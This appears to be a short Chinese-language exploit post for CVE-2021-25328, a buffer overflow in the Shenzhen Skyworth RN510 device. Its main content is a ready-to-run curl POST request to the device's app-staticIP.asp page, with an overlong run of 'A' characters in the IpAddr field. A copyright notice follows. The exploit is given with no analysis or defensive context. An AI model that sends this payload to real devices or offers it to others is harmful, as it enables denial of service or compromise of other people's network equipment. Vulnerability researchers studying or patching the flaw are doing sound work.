# CVE-2021-25328 Shenzhen Skyworth (深圳創維)RN510緩衝區溢出漏洞
==EXP==
curl -i -s -k -X $'POST' \
-H $'Host: device_IP' -H $'User-Agent: Mozilla/5.0 (X11; Linux
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
-H $'Referer: http://device-ip/cgi-bin/app-staticIP.asp' -H
$'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:
500' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'SESSIONID=valid_cookie; UID=username; PSW=password' \
--data-binary
$'hEntry0=-1&hEntry1=-1&hEntry2=-1&hEntry3=-1&hEntry4=-1&hEntry5=-1&hEntry6=-1&hEntry7=-1&hEntry8=-1&delete_flag=0&add_flag=1&staticNum=0&emptyEntry=0&tmpStartIp=192.168.2.33&tmpPoolCount=32&dhcpEthStart=192.168.2.33&dhcpEthEnd=32ðSubnetMask=255.255.255.0&IpAddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&MACAddr=AA%3ABB%3ACC%3ADD%3AEE%3AFF'
\
$'http://device_ip/cgi-bin/app-staticIP.asp'
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容